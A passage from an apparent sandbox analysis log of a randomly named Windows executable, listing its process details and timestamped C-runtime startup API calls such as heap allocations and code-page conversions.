[0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 74 os_tid = 0xbd8 Thread: id = 75 os_tid = 0x6fc Thread: id = 76 os_tid = 0x5b4 Thread: id = 77 os_tid = 0x59c Thread: id = 78 os_tid = 0x594 Thread: id = 79 os_tid = 0x58c Thread: id = 91 os_tid = 0xa68 Process: id = "6" image_name = "onb5h0yx46mrevq4.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\onb5h0yx46mrevq4.exe" page_root = "0x3b494000" os_pid = "0x6c8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x414" cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OnB5h0yX46mreVq4.exe\" --Admin IsNotAutoStart IsNotTask" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 81 os_tid = 0x1c4 [0144.814] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff7c | out: lpSystemTimeAsFileTime=0x18ff7c*(dwLowDateTime=0xf4ba6c0, dwHighDateTime=0x1d69ad5)) [0144.814] GetCurrentProcessId () returned 0x6c8 [0144.814] GetCurrentThreadId () returned 0x1c4 [0144.814] GetTickCount () returned 0x11548c4 [0144.814] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff74 | out: lpPerformanceCount=0x18ff74*=26489057594) returned 1 [0145.011] GetStartupInfoW (in: lpStartupInfo=0x18ff20 | out: lpStartupInfo=0x18ff20*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OnB5h0yX46mreVq4.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x5, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x18ff84, hStdError=0x409651)) [0145.011] HeapCreate (flOptions=0x0, dwInitialSize=0x1000, dwMaximumSize=0x0) returned 0x1e0000 [0145.012] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0145.012] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0145.012] GetProcAddress (hModule=0x76d30000, lpProcName="FlsGetValue") returned 0x76d41252 [0145.012] GetProcAddress (hModule=0x76d30000, lpProcName="FlsSetValue") returned 0x76d44208 [0145.012] GetProcAddress (hModule=0x76d30000, lpProcName="FlsFree") returned 0x76d4359f [0145.013] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0145.013] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0145.013] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0145.013] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0145.013] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0145.013] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0145.013] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0145.013] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0145.013] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0145.014] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0145.014] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0145.014] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0145.014] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0145.014] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0145.015] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0145.015] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0145.015] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x8, Size=0x214) returned 0x1e07d0 [0145.015] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0145.015] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0145.015] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0145.015] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0145.016] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0145.016] GetCurrentThreadId () returned 0x1c4 [0145.016] GetStartupInfoA (in: lpStartupInfo=0x18fea4 | out: lpStartupInfo=0x18fea4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OnB5h0yX46mreVq4.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x5, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0145.016] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x8, Size=0x800) returned 0x1e09f0 [0145.016] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0145.016] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0145.016] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0145.016] SetHandleCount (uNumber=0x20) returned 0x20 [0145.016] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OnB5h0yX46mreVq4.exe\" --Admin IsNotAutoStart IsNotTask" [0145.016] GetEnvironmentStringsW () returned 0x2d1d58* [0145.017] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xaca) returned 0x1e11f8 [0145.017] FreeEnvironmentStringsW (penv=0x2d1d58) returned 1 [0145.017] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4a88b0, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OnB5h0yX46mreVq4.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\onb5h0yx46mrevq4.exe")) returned 0x3a [0145.017] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xcc) returned 0x1e1cd0 [0145.017] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x8, Size=0x98) returned 0x1e1da8 [0145.017] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x8, Size=0x3e) returned 0x1e1e48 [0145.017] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x8, Size=0x6c) returned 0x1e1e90 [0145.017] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x8, Size=0x6e) returned 0x1e1f08 [0145.017] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x8, Size=0x78) returned 0x1e1f80 [0145.017] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x8, Size=0x62) returned 0x1e2000 [0145.017] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x8, Size=0x2e) returned 0x1e2070 [0145.017] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x8, Size=0x48) returned 0x1e20a8 [0145.017] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x8, Size=0x28) returned 0x1e20f8 [0145.017] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x8, Size=0x1a) returned 0x1e2128 [0145.017] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x8, Size=0x4a) returned 0x1e2150 [0145.017] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x8, Size=0x72) returned 0x1e21a8 [0145.017] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x8, Size=0x30) returned 0x1e2228 [0145.017] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x8, Size=0x2e) returned 0x1e2260 [0145.018] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x8, Size=0x1c) returned 0x1e2298 [0145.018] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x8, Size=0xd2) returned 0x1e22c0 [0145.018] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x8, Size=0x7c) returned 0x1e23a0 [0145.018] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x8, Size=0x36) returned 0x1e2428 [0145.018] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x8, Size=0x3a) returned 0x1e2468 [0145.018] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x8, Size=0x90) returned 0x1e24b0 [0145.018] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x8, Size=0x24) returned 0x1e2548 [0145.018] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x8, Size=0x30) returned 0x1e2578 [0145.018] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x8, Size=0x36) returned 0x1e25b0 [0145.018] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x8, Size=0x48) returned 0x1e25f0 [0145.018] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x8, Size=0x52) returned 0x1e2640 [0145.018] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x8, Size=0x3c) returned 0x1e26a0 [0145.018] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x8, Size=0x82) returned 0x1e26e8 [0145.018] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x8, Size=0x2e) returned 0x1e2778 [0145.018] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x8, Size=0x1e) returned 0x1e27b0 [0145.018] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x8, Size=0x2c) returned 0x1e27d8 [0145.018] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x8, Size=0x54) returned 0x1e2810 [0145.018] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x8, Size=0x52) returned 0x1e2870 [0145.018] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x8, Size=0x2a) returned 0x1e28d0 [0145.018] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x8, Size=0x3c) returned 0x1e2908 [0145.018] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x8, Size=0x54) returned 0x1e2950 [0145.018] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x8, Size=0x24) returned 0x1e29b0 [0145.018] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x8, Size=0x30) returned 0x1e29e0 [0145.018] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x8, Size=0x8c) returned 0x1e2a18 [0145.018] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1e11f8 | out: hHeap=0x1e0000) returned 1 [0145.020] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x8, Size=0x80) returned 0x1e2ab0 [0145.020] GetLastError () returned 0x0 [0145.020] SetLastError (dwErrCode=0x0) [0145.020] GetLastError () returned 0x0 [0145.020] SetLastError (dwErrCode=0x0) [0145.020] GetLastError () returned 0x0 [0145.020] SetLastError (dwErrCode=0x0) [0145.020] GetACP () returned 0x4e4 [0145.020] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x220) returned 0x1e2b38 [0145.021] GetLastError () returned 0x0 [0145.021] SetLastError (dwErrCode=0x0) [0145.021] IsValidCodePage (CodePage=0x4e4) returned 1 [0145.021] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fe84 | out: lpCPInfo=0x18fe84) returned 1 [0145.021] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f950 | out: lpCPInfo=0x18f950) returned 1 [0145.021] GetLastError () returned 0x0 [0145.021] SetLastError (dwErrCode=0x0) [0145.021] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x18f8e0 | out: lpCharType=0x18f8e0) returned 1 [0145.021] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0145.021] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6c8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0145.021] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18f964 | out: lpCharType=0x18f964) returned 1 [0145.021] GetLastError () returned 0x0 [0145.021] SetLastError (dwErrCode=0x0) [0145.021] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0145.021] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0145.021] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f698, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ☓曳@Ā") returned 256 [0145.021] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ☓曳@Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0145.021] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ☓曳@Ā", cchSrc=256, lpDestStr=0x18f488, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0145.021] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchWideChar=256, lpMultiByteStr=0x18fc64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x89|N%\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0145.022] GetLastError () returned 0x0 [0145.022] SetLastError (dwErrCode=0x0) [0145.022] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0145.022] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6b8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ☓曳@Ā") returned 256 [0145.022] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ☓曳@Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0145.022] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ☓曳@Ā", cchSrc=256, lpDestStr=0x18f4a8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ") returned 256 [0145.022] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ", cchWideChar=256, lpMultiByteStr=0x18fb64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f 